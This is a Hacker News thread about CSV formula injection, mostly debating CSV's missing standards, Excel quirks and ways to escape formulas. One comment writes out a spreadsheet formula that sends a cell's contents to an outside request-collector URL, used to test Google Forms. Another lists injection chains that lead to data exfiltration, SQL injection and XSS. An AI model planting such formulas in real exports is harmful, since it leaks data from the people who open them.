
Dangers of CSV Injection - rpenm
http://georgemauer.net/2017/10/07/csv-injection.html
======
Dylan16807
> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found
> only one (undocumented) thing that works with any sort of reliability: For
> any cell that begins with one of the formula triggering characters =, -, +,
> or @, you should directly prefix it with a tab character.

>Unfortunately that’s not the end of the story. The character might not show
up, but it is still there. A quick string length check with =LEN(D4) will
confirm that.

The documented way is prefixing with a ' character. It doesn't have the length
issue either.

As to the root issue, I can't think of any perfect way to transfer a series of
values between applications that apply different types to those values and
applications that don't. At some point, something is going to have to guess.

~~~
autra
> The documented way is prefixing with a ' character. It doesn't have the
> length issue either.

It is suggested in comments, but the author answered

> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV
> exporter doesn't write the ', so if the user saves the ‘safe’ file and then
> loads it again all the problems are back.

:-/

~~~
smhenderson
That's it. My pet peeve issue with Excel/CSV is USA zip codes. Excel will
happily eat leading zeros. There is a specific number format to correct that.
If you export that file to CSV with the format set the CSV file will have 5
digits. If you reopen that CSV file in Excel it gobbles up the zeros all over
again.

As someone mentioned elsewhere this is an issue with long numbers. Excel
converts them to scientific notation. Reformat and export, all good. Reopen
said file, back to scientific notation.

Really anything that relies on an escape character (') or a specific format
gets lost on export to CSV. It exports correctly but there is simply no way to
document these formats in a CSV file and have it be compatible with anything
but Excel.

~~~
ewheeler
Same with phone numbers. In most parts of the world, local numbers (not fully-
qualified with country code), are written/dialed with a leading zero. Excel
eats these and/or uses scientific notation!

------
pavel_lishin
Excel is the source of so many problems. At work, we ask users for an input in
CSV or Excel format, and most people see "CSV" and export Excel data as CSV.
Which is fine and great, but long numbers - such as UPCs - show up in Excel as
scientific notation, being big scary numbers, _and also get exported as such_.

So when an Excel cell contains the UPC 123456123456, we get a CSV file that
contains "1.23456E+11", which is worse than useless.

~~~
geocar
_CSV_ is the source of so many problems. CSV has no character set, no rule for
escaping double-quotation marks, commas, and newlines. There's not even a way
to look at a CSV file and tell what it's "rules" are beyond heuristics and
those only take you so far.

I ask for XLSX files since at least it's structured, unambiguous and
documented, but even better: a minimal XLSX parser is trivial (about a page)
to write.

Also: Educating users on how to specify the character set in every application
that the user seems to want to use is a special kind of hell.

~~~
dvlsg
Rfc 4180 definitely lays out rules for how to escape double quotes, commas,
and newlines.

~~~
geocar
RFC4180 is worse than worthless; Do not implement it and claim you support
"CSV files". Almost every paragraph is useless, wrong, or dangerous; it's few
citations offer conflicting and sometimes clearly-stupid advice where they
advice the use of CSV at all. Some examples:

§ 2.1 says that lines end in CRLF. This is in opposition to every UNIX-based
system out there (which outnumber systems that use CRLF as a line delimiter by
between 2:1 and 8:1 depending on how you choose to estimate this) and means
that CSV files either don't exist on Mac OS X or Linux, or aren't "text files"
by the standard definition of that term -- both absolutely silly conclusions!
Nevertheless, following RFC4180-logic, § 2.6 thus suggests that a bare line-
feed can appear unquoted.

§ 2.3 says the header is optional and that a client knows if it is present
because the MIME type says "text/csv; header" then § 3 admits that this isn't
very helpful and clients will have to "make their own decision" anyway.

§ 2.7 requires fortran-style doubling of double-quote marks, like COBOL and
SQL, and ignores that many "CSV" systems use backslash to escape quotes.

§ 3 says that the character set is in the mime type. Operating systems which
don't use MIME types for their file system (i.e. almost all of them) thus
cannot support any character set other than "US-ASCII".

None of these "suggestions" are true of any operating system I'm aware of, nor
are they true of any popular CSV consumer; If a conforming implementation of
RFC4180 exists, it's definitely not useful. In fact, one of the citations
(ESR) says:

 _The bad results of proliferating special cases are twofold. First, the
complexity of the parser (and its vulnerability to bugs) is increased. Second,
because the format rules are complex and underspecified, different
implementations diverge in their handling of edge cases. Sometimes
continuation lines are supported, by starting the last field of the line with
an unterminated double quote — but only in some products! Microsoft has
incompatible versions of CSV files between its own applications, and in some
cases between different versions of the same application (Excel being the
obvious example here)._

A better spec would be honest about these special cases. A "good"
implementation of CSV:

• needs a flag or switch indicating whether there is a header or not

• needs to be explicitly told the character set

• needs a flag to specify the escaping method \ or ""

• needs the line-ending specified (CR, LF, CRLF, [\r\n]{1,}, or \r{0,}\n{1,})

... and it needs all of these flags and switches "user-accessible". RFC4180
doesn't mention any of this, and so anyone who picks it up looking for
guidance is going to be deluded into thinking that there are rules for
"escaping double quotes" or "commas" or "newlines" that will help them consume
and produce CSV files. Anyone writing specifications for developers who tries
to use RFC4180 for guidance to implement the "import CSV files" feature is
going to be left to dry.

The devil has demanded I support CSV, so the advice I can give to anyone who
has received a similar requirement:

• parse using a state machine (and not by recursive splitting or a regex-with-
backtracking).

• use heuristics to "guess" the delimiter by observing that a file is likely
rectangular -- tricky, since some implementations don't include trailing
delimiters if the trailing values in a row are missing. I use a bag of
delimiters (, ; and tab) and choose the one that produces the most columns,
but has no rows with more columns than the first.

• use heuristics to "guess" the character set _especially if the import might
have come from Windows_. For web applications I use header-hints to guess the
operating system and language settings to adjust my weights.

• use heuristics to "guess" the line-ending method. I normally use whatever
the first-line ends in unless [\r\n]{1,} produces a better rectangle and no
subsequent lines extend beyond the first one.

A successful and fast implementation of all of these tricks is a challenge for
any programmer. If you guess first, then let the user guide changes with
switches, your users will be happiest, but this is very relative: Users think
parsing CSV is "easy" so they're sure to complain about any issues. I have
saved per-user coefficients for my heuristic guesses to try and make users
happier. I have wasted more time on CSV than I have any other file format.

My advice is that we should ignore RFC4180 completely and, given the choice,
avoid CSV files for any real work. XLSX is unambiguous and easy enough that a
useful implementation takes less space than my criticism of CSV takes- and
weirdly enough- many uses of "CSV" are just "I want to get my data out of
Excel" anyway.

~~~
linuxps2
To me the issue isn't how we should read in CSV (as you stated, we should use
a different format that is less ambiguous) but rather getting vendors to
provide the data in that new format. I've found that most vendors I work with
are using a cobbled together solution built on top of a mainframe and getting
them to add/remove a field from CSV is a monumental task, there is no way they
will move to a different format like XLSX or JSON or XML. Until there is an
open, industry-wide standard, I just don't see CSV going away

~~~
geocar
Which part of that do you think I disagreed with?

~~~
linuxps2
None? You seemed to have touched mostly on _consuming_ CSV and safe ways to do
that and suggested XLSX - I'm just adding that digesting CSV safely isn't our
biggest issue, it's getting vendors to use something other than CSV and
unfortunately that is typically out of most people's control.

------
datenwolf
The thing that puzzles me the most is, that people use _C_SV at all.
Separation by comma, or any other member of the printable subset of ASCII in
the first place. What this essentially boils down to is ambiguous in-band-
signalling and a contextual grammar.

ASCII had addressed the problem of separating entries ever since its creation:
Separator control codes. There are:

x01 SOH "Start of Heading"

x02 STX "Start of Text"

x03 ETX "End of Text"

x04 EOT "End of Transmission"

x1C FS "File Separator"

x1D GS "Group Separator"

x1E RS "Record Separator"

x1F US "Unit Separator"

You can use those just fine for exchanging data as you would using CSV, but
without the ambiguities of separation characters and the need to quote
strings. Heck if payload data is limited to the subset ASCII/UTF-8 without
control codes you can just dump anything without the need for escaping or
quoting.

So my suggestion is simple. Don't use CSV or "P"SV (printable separated
values). Use ASV (ASCII separated values).

~~~
ajdlinux
Give me a version of every standard text editor that can let me display and
edit these ASV files when I just need to quickly hack something, and sure,
I'll use it. CSV is directly editable in any text editor and manipulable by
standard text processing tools, that's one of its key advantages.

~~~
emidln
Vim and Emacs can. If your editor can't, maybe it should get with the (54 year
old) program.

~~~
apocalyptic0n3
The number of devs who can competently use Vim or Emacs is already on the low
side. The number of non-devs that can do it is far lower. The file needs to be
editable by _any_ user with a text editor, not just a developer versed in
Vim/Emacs.

I know the response will be "they'll just open it in Excel anyway" which is
true in most cases, but I frequently have clients that want to download an
export, modify it real quick with a text editor (many use Notepad++ for this),
and then reupload it. They're usually doing massive find/replaces on the data
and then reuploading into the system and a simple text editor is a lot better
for this than Excel.

~~~
zeveb
> The number of devs who can competently use Vim or Emacs is already on the
> low side.

Someone who cannot competently use either vim or emacs is not a developer.

> The number of non-devs that can do it is far lower.

The emacs paper talked about departmental secretaries using — and extending —
emacs. Human beings are far cleverer than we like to think.

~~~
UncleMeat
CS PhD and professional software engineer here. I can edit files very slowly
and inefficiently in both vim and emacs but it would be a mess to use them for
real work.

Some people never learned either of the editors. So what? The physical act of
writing text was never the hard part of software engineering.

------
bitexploder
I have been finding this vulnerability in apps since I started in infosec 10
years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi

Malicious input -> CSV download from web app -> Excel -> formula -> sneaky
data exfil

CSV -> JS -> import into web app XSS (in places no other XSS existed because
of the data)

CSV import -> weird CSV header -> arbitrary data loading (headers were column
names.... Schema injection .. like SQLi only more hilarious

Point is apps and devs can have blind spots (knowledge gaps) or just not think
of a CSV import or export like other functionality.

~~~
e1g
We recently went through an external pentest simulating a hostile actor with
inside information. We had 2 weeks to prepare and successfully defended
against timing attacks, DDoS attempts, identity spoofs, request modifications,
script injections etc. Passed with flying colors... except for CSV/Excel
injection. Everyone looked at each other with the sheepish embarrassment of
being pwned by a script kiddie. This was a total blind spot indeed, even after
we reviewed every other user I/O.

~~~
f00_
>defend against DDoS but not sanitizing user input

>calling a pentested a script kiddie

welp, my work is done here

~~~
e1g
I wrote "script kiddie" as a way to describe the relative complexity of this
attack vector - I was highly impressed with the pentest process, and think
it's one of the smartest things we did this quarter.

Filtering user inputs is security 101, yet we missed this while focusing on
fancy defense mechanics. This large gap between what the engineering team
prepared for, and how they were exposed, is what made the outcome
"embarrassing" \- hence I agreed with GP that CSV/Excel stuff could be a blind
spot even for well-trained people.

~~~
f00_
for sure, I think i'm just sensitive to the use of script kiddie haha

Atleast you're thinking about it, company I work for definitely prioritizes
freedom over security if you know what i mean

------
kristofferR
CSV is hell. Some idiot somewhere decided that Comma Separated Values in
certain locales should be based on semicolons (who would have thought files
would be shared across country borders!?), so when we open CSV files that are
actually comma separated all the information is in the first cell (until a
semicolon appears).

To get comma separated CSVs to show properly in Excel we have to mess around
with OS language settings. CSV as a format should have died years ago, it's a
shame so many apps/services only export CSV files. Many developers (mainly
US/UK based) are probably not aware of how much of a headache they inflict on
people in other countries by using CSV files.

~~~
seszett
> _Some idiot somewhere decided that Comma Separated Values in certain locales
> should be based on semicolons_

Semicolons are really better though, because they aren't used as a decimal
separator unlike commas in most countries.

I don't know about Excel, but LibreOffice allows very easily to select which
parameters to use when opening a CSV file, it works just fine.

~~~
PhasmaFelis
> _Semicolons are really better though, because they aren 't used as a decimal
> separator unlike commas in most countries._

If you're going to separate values with semicolons--which is perfectly
reasonable--I feel like you probably shouldn't do that with a format called
Comma Separated Values.

------
splike
Interestingly, genetic biologists are probably more aware of this problem than
most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they
automatically get converted to dates by Excel. This has potentially had a
fairly large effect on research in the area [1]. One of the many reasons we
insist on only using Ensembl IDs for genes at my company.

[1]
[https://genomebiology.biomedcentral.com/articles/10.1186/s13...](https://genomebiology.biomedcentral.com/articles/10.1186/s13059-016-1044-7)

~~~
xelxebar
Just curious, but what about non-vertebrates? I'd have expected there to be an
official number/hash that identifies genes like the InChI Key for chemistry or
something. IIRC, that key in particular is just a SHA-256 of a long human-
readable "chemical formula".

~~~
splike
We'll cross that bridge when we come to it I guess, but we work almost
exclusively with human and mouse genomes for now.

In any case, I imagine the Ensembl ID is still safer than other encodings in
the case of invertebrates. For example, genes IDs in the Fruit fly genome look
like FBgn0034730.

------
jkabrg
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV
dialect with its own file extension. Or maybe just use SQLite tables or
Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.

* No agreement about escape characters.

* No agreement about separator characters.

* No agreement about line endings.

* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?

* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when
I change operating system. Sometimes I end up clobbering the file itself.

Good things: * Human readable. * Simple.

I think the addition of some rules, and a standard interpretation of them,
could go some way to improving the format.

~~~
kqr
See, one of the reasons CSV managed to get so ubiquitous is precisely because
all those things are unspecified. CSV is not a popular format; CSV is the name
we give 960 visually similar but very different formats that as a collective
are popular.

The thing you use CSV for is not it's technical merit. You use CSV for its
ubiquity. If you nailed down all those things you talk about, you would have a
much, much smaller user base and there would be no reason to use CSV in the
first place.

(Hey, this reminds me of a similar situation governing s/CSV/C/g...)

------
fulafel
This is foremost a vulnerability in Excel and Google Sheets, like the article
concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing
code?

~~~
sanotehu
Yes, through the "Import" feature. Excel will in that case allow you to choose
what "type" each column in the CSV has (and will not parse text if given the
"text" type). The problem is that a lot of users (myself included) will use
muscle memory and double-click a CSV file in windows explorer rather than
opening up Excel and initiating an import.

~~~
yjftsjthsd-h
So why does it not import when opening files?

~~~
mijamo
Because you can create documents with formulas, save them as CSV and open them
again. If it did an import when opening, the operation save A -> load A would
result in a different result than the file you had when you clicked saved.

or at least this the most logical explanation I could find.

------
top_post
Sorry to balk, but I'm more outraged at the title, another injection I need to
talk about that isn't really the case. The root cause is the interpreter
executing untrusted input, the same can be said about macros or any other file
type. The perception being most people open CSV files on a regular basis and
perceive them to be safe or not interpreted when it appears they are.

~~~
bitexploder
Well, it catches folks by surprise. We could abstract all computer vulns down
to a few broad computing concepts, but that isn't as useful.

This one is your data turned out to be code. There are many, many books on all
the various forms this takes. Memory corruption cat and mouse..... It is a
long complex story that we can sweep up to that generalization. But it is
important to know that high, medium, and low level of these issues. They form
a gigantic tree. The medium level somewhere between is where devs need to
threat model most of the time. But some of the time things are very specific
and you just need to know about the specific thing and not it's various
generalized forms, because the specific thing can really matter. E.g. simple
programming mistakes lead to side channels, etc. We can generically understand
a side channels easily. But it takes a ton of specific hard earned knowledge
to avoid it.

~~~
top_post
It kind of is more useful to abstract them, so we're not whack-a-moling the
current hype or hot title of the day and can focus on the fundamental issues.

I agree, it catches people off guard to think CSV files once interpreted can
do more than give columns of information, but it's not an injection which is
my beef.

~~~
bitexploder
You have to do both. When something unusual comes up it is good to file it
away as a possibility. To be fair these have ways been "obvious" on pentests.
When you start from the point of all input is dangerous, how can I abuse this
one, it becomes the logical conclusion to put in an Excel formula. That is
your point, I think. But my experience has told me some inputs are just
assumed safe, even by developers that program defensively. So you have to
embrace both IMO.

------
Cyranix
This seems like an appropriate place to suggest that anyone who finds these
kinds of attack vectors interesting should check out the bug bounty program
for my current place of work, which processes loads of CSV and Excel files
from government customers.

[https://bugcrowd.com/socrata](https://bugcrowd.com/socrata)

(But please, just do me a small favor and don't submit any reports for SQL
injection or information disclosure if you're using the SQL-like API that we
expressly provide for the purpose of accessing public data. We get a couple
clueless people sending such reports every week.)

------
Swizec
This brings XSS to a whole new level. Imagine what happens if you know some of
what you post in a website as a user eventually gets reviewed by somebody who
gets it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.

~~~
_betty_
this used to be common with txt files and IE's terrible practice of sniffing
content. It would see a txt file that contained html and display the html
instead, it could then pull in a secret silverlight file that was mascarading
as a docx file as they are both simply zip files. Even more amusingly
silverlight and docx contents don't clash so it could still be a valid docx
file if you opened it, and the txt file would look like txt even though it was
really rendering html with a hidden silverlight app.

------
Mortiffer
Incase anyone else was wondering about Google Forms : I tried inputting
=IMPORTXML(CONCAT("[https://requestb.in/15z4vk51?f=",H8](https://requestb.in/15z4vk51?f=",H8)),"//a")
into a text field and google automatically appends a "'" such that '=IMPORTXML
does not execute

------
jaclaz
At least here (Italy) CSV is not commonly used (because of the different way
we use the comma as a decimal point) and the default (in Excel) separator is
then set to a semi-colon.

A more common format is TSV (TAB delimited) which makes a lot more sense,
however the best choice when importing data in Excel is still to change the
file extension to a non-recognized extension (like - say - .txt) and in the
"import wizard" set the appropriate separator and set all columns as "text".

------
captn3m0
On the first attack vector: Google Security has a nice post about it [0] and
why they do not consider it a valid threat. This is their reasoning:

>CSV files are just text files (the format is defined in RFC 4180) and
evaluating formulas is a behavior of only a subset of the applications opening
them - it's rather a side effect of the CSV format and not a vulnerability in
our products which can export user-created CSVs. This issue should mitigated
by the application which would be importing/interpreting data from an external
source, as Microsoft Excel does (for example) by showing a warning. In other
words, the proper fix should be applied when opening the CSV files, rather
then when creating them.

[0]:
[https://sites.google.com/site/bughunteruniversity/nonvuln/cs...](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-
excel-formula-injection)

Their policy makes it sound like that the second vulnerability should indeed
be fixed in Google Sheets itself (it is the one opening the file, after all)

------
jonnycomputer
CSV is a mess (are a mess?), but all these vulnerabilities have to do with
spreadsheet applications' consumption of CSVs. There are very legitimate
reasons a CSV might include fragments of potentially executable code, after
all.

------
filereaper
I'd be curious if anyone has hit exploits with CSV files and bulk ingestion
into datawarehouses (eg Redshift, Greenplum, etc..) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of
their evils of escaping characters, comma delimitation, etc...

A lot of old legacy systems know CSV and its easy to inspect visually as
compares to more efficient binary formats like ORC or Paquet.

------
tatersolid
Like it or not, Excel’s behavior defines the CSV file format and how it is
used in the real world. The writing of an RFC 15 years too late has not and
will never “fix” CSV. It’s crusted over over with bugs and inconsistencies for
all time.

Use anything else, even XLSX which is at least a typed and openly standardized
format.

------
stepri
When you import a CSV file into Google Sheets (File -> Import), you can choose
in the dialog to convert text to numbers and dates. If you choose not to
convert, Google Sheets places a single quote (') before the function.

------
ecesena
Does anybody know any good library that solve the problem, in any language?

------
ComodoHacker
My Excel 2010 doesn't execute shell code from author's example. Heck, it
doesn't even parse CSV and loads everything into one column as text. What am I
doing wrong?

~~~
randkyp
As weird as it sounds, it might be related to your system region settings,
specifically the decimal point sign and the thousands separator sign. I've
been only able to open CSVs by manually importing them with Excel's 'import
data from text file' function.

------
TAForObvReasons
CSV is a pretty poor format in that it mixes the presentation and the
underlying values. There is no standard for dates (dd/mm/yyyy or mm/dd/yyyy
?). The "standard" RFC4180 is extremely vague when discussing value
interpretation. As proprietary as XLSX is, at least the Excel format separates
the raw values from the presentation.

~~~
pmoriarty
There's nothing in CSV that has anything to do with presentation (nor with
what the underlying values are, for that matter).

These vulnerabilities can't be blamed on CSV so much as on the desire of
application vendors to treat data as code.

------
beached_whale
Excel protects for this, at least mine does v2013

~~~
Piskvorrr
As mentioned, protects by showing a wall of text with "yes" preselected at
bottom; equally useless and annoying.

------
jasonmaydie
Shouldn't this be the dangers of Excel? CSVs are benine

------
hutch120
Little Bobby Tables reminds us to sanitize our database inputs.

[https://imgs.xkcd.com/comics/exploits_of_a_mom.png](https://imgs.xkcd.com/comics/exploits_of_a_mom.png)

~~~
billpg
That's bad advice.

[http://blog.hackensplat.com/2013/09/never-sanitize-your-
inpu...](http://blog.hackensplat.com/2013/09/never-sanitize-your-inputs.html)

~~~
trishmapow2
Expected something revolutionary, turned out to be an argument over
semantics...

~~~
billpg
I'm going to interpret your comment as high praise. If you object to that
interpretation, I'll dismiss your objection as just an argument over
semantics. :)

